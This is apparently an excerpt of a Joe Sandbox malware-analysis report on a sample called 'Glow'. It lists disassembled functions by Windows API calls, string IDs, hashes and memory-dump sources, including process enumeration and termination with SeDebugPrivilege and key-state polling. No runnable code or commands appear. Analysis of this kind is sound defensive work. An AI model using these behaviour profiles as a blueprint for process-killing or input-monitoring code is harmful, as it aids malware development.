                                                                                                                                                                          • Instruction ID: b72fb6e99b0dc350959be30fdbb791c9ba70e15d0c48f2c4951abffdf082f236
                                                                                                                                                                          • Opcode Fuzzy Hash: 40ab81c74d61d0c30e47eb1bdbe558a81a8f1c12c30aefc7a2efdc61115c7ff3
                                                                                                                                                                          • Instruction Fuzzy Hash: 5001ACB5640344BFE710AB65DC49FA77BACEB88711F008421FA05DB1A1C6749C00CA24
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003841EA: _wcslen.LIBCMT ref: 003841EF
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003ECF99
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003ECFE0
                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003ED047
                                                                                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003ED075
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                          • String ID: ,*E$0$<*E
                                                                                                                                                                          • API String ID: 1227352736-2863260501
                                                                                                                                                                          • Opcode ID: ee4e765f776b11fe7bb904305d3763a057fe5bbb4bbfff8776828d591df72b87
                                                                                                                                                                          • Instruction ID: b087a8fac3eb052c40c0492c526fd98e54a4f3603174c8e1be07f49f1ce32c91
                                                                                                                                                                          • Opcode Fuzzy Hash: ee4e765f776b11fe7bb904305d3763a057fe5bbb4bbfff8776828d591df72b87
                                                                                                                                                                          • Instruction Fuzzy Hash: A851F0716143A09FD716AF2AC845BAFB7E8AF86314F080B29F991D71D1DBB0CD068752
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003EDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 003EDDAC
                                                                                                                                                                            • Part of subcall function 003EDD87: Process32FirstW.KERNEL32(00000000,?), ref: 003EDDBA
                                                                                                                                                                            • Part of subcall function 003EDD87: CloseHandle.KERNEL32(00000000), ref: 003EDE87
                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040ABCA
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040ABDD
                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040AC10
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0040ACC5
                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 0040ACD0
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040AD21
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                          • API String ID: 2533919879-2896544425
                                                                                                                                                                          • Opcode ID: 5dc0a62dd3294f51068398d58c50a6d2698e49a11ea80bfd45ffbedf9eeec9de
                                                                                                                                                                          • Instruction ID: 62e17d3b7ffd9cdd5ad4d696820be6817509fd290b15d1f2ce2164ceec07494f
                                                                                                                                                                          • Opcode Fuzzy Hash: 5dc0a62dd3294f51068398d58c50a6d2698e49a11ea80bfd45ffbedf9eeec9de
                                                                                                                                                                          • Instruction Fuzzy Hash: D5619B70208341AFE321DF14C494F66BBA1AF54308F1984ADE8665FBE2C779EC45CB96
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004143C1
                                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004143D6
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004143F0
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00414435
                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00414462
                                                                                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00414490
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Window_wcslen
                                                                                                                                                                          • String ID: SysListView32
                                                                                                                                                                          • API String ID: 2147712094-78025650
                                                                                                                                                                          • Opcode ID: 1697fab20409103b8e69c0ea7e05433514ed115df520cd86f44732e6300466cf
                                                                                                                                                                          • Instruction ID: f9b7ea73c8cf204468a8831cf42cebbd694275d99904596a1bf61d74da894d2f
                                                                                                                                                                          • Opcode Fuzzy Hash: 1697fab20409103b8e69c0ea7e05433514ed115df520cd86f44732e6300466cf
                                                                                                                                                                          • Instruction Fuzzy Hash: 5C41C271A00319ABDF219F64CC49BEB7BA9FF48350F10052BF958E7291D7799980CB98
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003EC6C4
                                                                                                                                                                          • IsMenu.USER32(00000000), ref: 003EC6E4
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 003EC71A
                                                                                                                                                                          • GetMenuItemCount.USER32(01395910), ref: 003EC76B
                                                                                                                                                                          • InsertMenuItemW.USER32(01395910,?,00000001,00000030), ref: 003EC793
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                          • String ID: 0$2
                                                                                                                                                                          • API String ID: 93392585-3793063076
                                                                                                                                                                          • Opcode ID: a837c0f11b0ef361bfa8867e844254da1c8df32eb5e44288d598e7afd4a5c7f8
                                                                                                                                                                          • Instruction ID: e881a9b829d50f85150c3934ec9ccf90dc620ba08c9d86cd546a99f771c50117
                                                                                                                                                                          • Opcode Fuzzy Hash: a837c0f11b0ef361bfa8867e844254da1c8df32eb5e44288d598e7afd4a5c7f8
                                                                                                                                                                          • Instruction Fuzzy Hash: BD518071A102A59FDF12CF6AC884AAEBBF9BF44314F24921AE9119B2D1D3709942CF51
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 003819E1
                                                                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 003819FE
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00381A23
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 00381A3D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                          • String ID: $'8$$'8
                                                                                                                                                                          • API String ID: 4210589936-3484801174
                                                                                                                                                                          • Opcode ID: 83b020ff16ff69f410316e1b7f216eb9eff14155f46df1a2a94889bac14e931c
                                                                                                                                                                          • Instruction ID: 77da97400f6975f75b2cfbeb4bc354080d8e465d01127eaca687bf168fef980a
                                                                                                                                                                          • Opcode Fuzzy Hash: 83b020ff16ff69f410316e1b7f216eb9eff14155f46df1a2a94889bac14e931c
                                                                                                                                                                          • Instruction Fuzzy Hash: E0416171A0420AFFDF1AEF64C844BFEB778FB05324F25825AE469A6290C7345E54CB91
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0
                                                                                                                                                                          • BeginPaint.USER32(?,?,?), ref: 00381B35
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00381B99
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00381BB6
                                                                                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00381BC7
                                                                                                                                                                          • EndPaint.USER32(?,?,?,?,?), ref: 00381C15
                                                                                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003C3287
                                                                                                                                                                            • Part of subcall function 00381C2D: BeginPath.GDI32(00000000), ref: 00381C4B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                          • String ID: (E
                                                                                                                                                                          • API String ID: 3050599898-3218771753
                                                                                                                                                                          • Opcode ID: 799dacfcea8fdff5b4cbd07089573a024e4035556adf65b386b19bd452052876
                                                                                                                                                                          • Instruction ID: 4bad0b4ea45d4fdb2a40dd6a105f524f92650a8c934099c6ea1a30ab7b2d371e
                                                                                                                                                                          • Opcode Fuzzy Hash: 799dacfcea8fdff5b4cbd07089573a024e4035556adf65b386b19bd452052876
                                                                                                                                                                          • Instruction Fuzzy Hash: C441A1B0604300AFCB12EF24DC84FB67BBCEB46325F044669F9548B2A2C7709D45DB62
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00418740
                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00418765
                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0041877D
                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 004187A6
                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,003FC1F2,00000000), ref: 004187C6
                                                                                                                                                                            • Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0
                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 004187B1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Long$MetricsSystem
                                                                                                                                                                          • String ID: (E
                                                                                                                                                                          • API String ID: 2294984445-3218771753
                                                                                                                                                                          • Opcode ID: 02fb5bc9b3a658c59f6f82f8e25180262d1a7b83d876207164b80c07b8115bcc
                                                                                                                                                                          • Instruction ID: 133ddcd707a7f5e4996807b642fafe386d5c8dd7071a8fa5cfaa911258cfe919
                                                                                                                                                                          • Opcode Fuzzy Hash: 02fb5bc9b3a658c59f6f82f8e25180262d1a7b83d876207164b80c07b8115bcc
                                                                                                                                                                          • Instruction Fuzzy Hash: A92183716106519FCB145F38DC04AAB37A5FB85365F24473EF936C22E0DB748890CB58
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 003ED1BE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconLoad
                                                                                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                                                                                          • API String ID: 2457776203-404129466
                                                                                                                                                                          • Opcode ID: 2df32ace68e6e1746c649e56811e6d4284418faa19d738faf3e5b7a70895735d
                                                                                                                                                                          • Instruction ID: e6ff42c8de43148cef561031b72febe283271c217cf494c04d737ca3a5311721
                                                                                                                                                                          • Opcode Fuzzy Hash: 2df32ace68e6e1746c649e56811e6d4284418faa19d738faf3e5b7a70895735d
                                                                                                                                                                          • Instruction Fuzzy Hash: 37112C3564C3A6BEF7075B15DC82DAA779CDF06760B21012AF900AA5C3E7F8AA014164
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                          • String ID: 0.0.0.0
                                                                                                                                                                          • API String ID: 642191829-3771769585
                                                                                                                                                                          • Opcode ID: 1abcf95e20cf5542a1f94c9610efe8c97a020c20492f7e2bebe814d1d73086c8
                                                                                                                                                                          • Instruction ID: 3a83d6bff257d26ffa54c59acb29a115acfcd26521202f9d9bb51d9c639884ab
                                                                                                                                                                          • Opcode Fuzzy Hash: 1abcf95e20cf5542a1f94c9610efe8c97a020c20492f7e2bebe814d1d73086c8
                                                                                                                                                                          • Instruction Fuzzy Hash: F611E4719002247FDB266B61DC4AEDA37ACEF41710F010175F525AA0D1EFB88A81CB54
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$LocalTime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 952045576-0
                                                                                                                                                                          • Opcode ID: d335c4d512dd45375a8894a09789c263230b76d39cac6a3be7fbe2e4b217a5a3
                                                                                                                                                                          • Instruction ID: 0af015320513afee02381e939a74c3dd38162064a1f4f2ca5984a0f5392ec7b0
                                                                                                                                                                          • Opcode Fuzzy Hash: d335c4d512dd45375a8894a09789c263230b76d39cac6a3be7fbe2e4b217a5a3
                                                                                                                                                                          • Instruction Fuzzy Hash: 6141D565C10514BACB12EBB8CC8AACFB3A8EF06310F418662E50CE7171FA74D251C3A6
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004137B7
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 004137BF
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004137CA
                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 004137D6
                                                                                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00413812
                                                                                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00413823
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00416504,?,?,000000FF,00000000,?,000000FF,?), ref: 0041385E
                                                                                                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0041387D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3864802216-0
                                                                                                                                                                          • Opcode ID: d09dadbe7f49d12975eba0be81251b599cfd110a89569c60dd3f38c44f802ab9
                                                                                                                                                                          • Instruction ID: 8e4862e2759325fd32e689c3ce39e3f7c2d4d7c4bbeb4391887732675f43c4f1
                                                                                                                                                                          • Opcode Fuzzy Hash: d09dadbe7f49d12975eba0be81251b599cfd110a89569c60dd3f38c44f802ab9
                                                                                                                                                                          • Instruction Fuzzy Hash: B231B1B2601214BFEB114F50CC89FEB3FADEF49751F044065FE089A291C6B99D81C7A8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                          • API String ID: 0-572801152
                                                                                                                                                                          • Opcode ID: c56d3d18686d50db2c69a6fecba8d24e187e2591c69f04f028a6175428ae3189
                                                                                                                                                                          • Instruction ID: f8fb3a08b9aee723001f4ff3733d194de0a18bdc23db3729c93f570972d778f5
                                                                                                                                                                          • Opcode Fuzzy Hash: c56d3d18686d50db2c69a6fecba8d24e187e2591c69f04f028a6175428ae3189
                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD1AD71A0060A9FDB10DFA8C885AAFB7B5FF48304F14857AE915AB281E774AD41CF64
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,003C1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 003C194E
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 003C19D1
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,003C1B7B,?,003C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 003C1A64
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 003C1A7B
                                                                                                                                                                            • Part of subcall function 003B3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,003A6A79,?,0000015D,?,?,?,?,003A85B0,000000FF,00000000,?,?), ref: 003B3BC5
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,003C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 003C1AF7
                                                                                                                                                                          • __freea.LIBCMT ref: 003C1B22
                                                                                                                                                                          • __freea.LIBCMT ref: 003C1B2E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2829977744-0
                                                                                                                                                                          • Opcode ID: 0c9dd55a0949441c4ddad060789dc821dd241d21b28e17b736f35dda1897f621
                                                                                                                                                                          • Instruction ID: 89e5245708d92540e2fe4583f993b386afcf6e8f681ad2717a87aba7257c9c9a
                                                                                                                                                                          • Opcode Fuzzy Hash: 0c9dd55a0949441c4ddad060789dc821dd241d21b28e17b736f35dda1897f621
                                                                                                                                                                          • Instruction Fuzzy Hash: 9F91C672E002169ADB228E64CC51FEEBBB9DF0B310F19466DE905E7142E735DD40EBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
